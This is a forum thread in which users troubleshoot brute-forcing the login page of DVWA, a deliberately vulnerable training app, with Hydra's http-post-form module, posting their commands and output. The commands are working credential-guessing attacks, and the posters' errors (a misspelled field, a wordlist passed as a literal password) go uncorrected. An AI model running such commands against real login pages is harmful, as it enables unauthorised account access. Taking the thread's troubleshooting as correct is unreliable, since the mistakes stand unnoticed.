Hydra brute force on login.php
Hello,
I'm trying to brute force my DVWA, so I know that the username and password are correct, but I must not be doing something right (user issue)... Below are the output and the command string I'm using. No matter what username and password I use, I get the same output, so I know it cannot be working. Could someone please help me find what other form or string I'm missing? Thank you very much!
root@bt:~# hydra -V -l admin -p XXXXX -s 80 -f 172.31.253.11 http-post-form "/dvwa/login.php:usrname=^USER^&pass=^PASS^&submit=Login: Login failed"
Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-09-16 09:48:37
[DATA] 1 tasks, 1 servers, 1 login tries (l:1/p:1), ~1 tries per task
[DATA] attacking service http-post-form on port 80
[STATUS] attack finished for 172.31.253.11 (waiting for children to finish)
[ATTEMPT] target 172.31.253.11 - login "admin" - pass "XXXXX" - child 0 - 1 of 1
Hydra (http://www.thc.org/thc-hydra) finished at 2011-09-16 09:48:37
Re: Hydra brute force on login.php
Hi,
Maybe you should try Hydra v7; the changelog said the http-form module has been updated.
Re: Hydra brute force on login.php
Hi,
I'm not sure that the latest Hydra, 7.4.2, can even guess anything. Today I did some tests using DVWA's BruteForce module, and the output was the same in both situations, whether or not the wordlist file contains the correct password:
hydra -V -l admin -p /media/Pluto/final-wordlist.lst -s 80 -f 192.168.71.138 http-post-form "/dvwa/login.php:username=^USER^&pass=^PASS^&submit=Login : Login failed"
Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2013-02-10 00:40:33
[DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking service http-post-form on port 80
[ATTEMPT] target 192.168.71.138 - login "admin" - pass "/media/Pluto/final-wordlist.lst" - 1 of 1 [child 0]
[80][www-form] host: 192.168.71.138 login: admin password: /media/Pluto/final-wordlist.lst
[STATUS] attack finished for 192.168.71.138 (valid pair found)
1 of 1 target successfully completed, 1 valid password found - It doesn't say which password anyway
Hydra (http://www.thc.org/thc-hydra) finished at 2013-02-10 00:40:33
Now I wonder: am I missing something, or am I doing something wrong?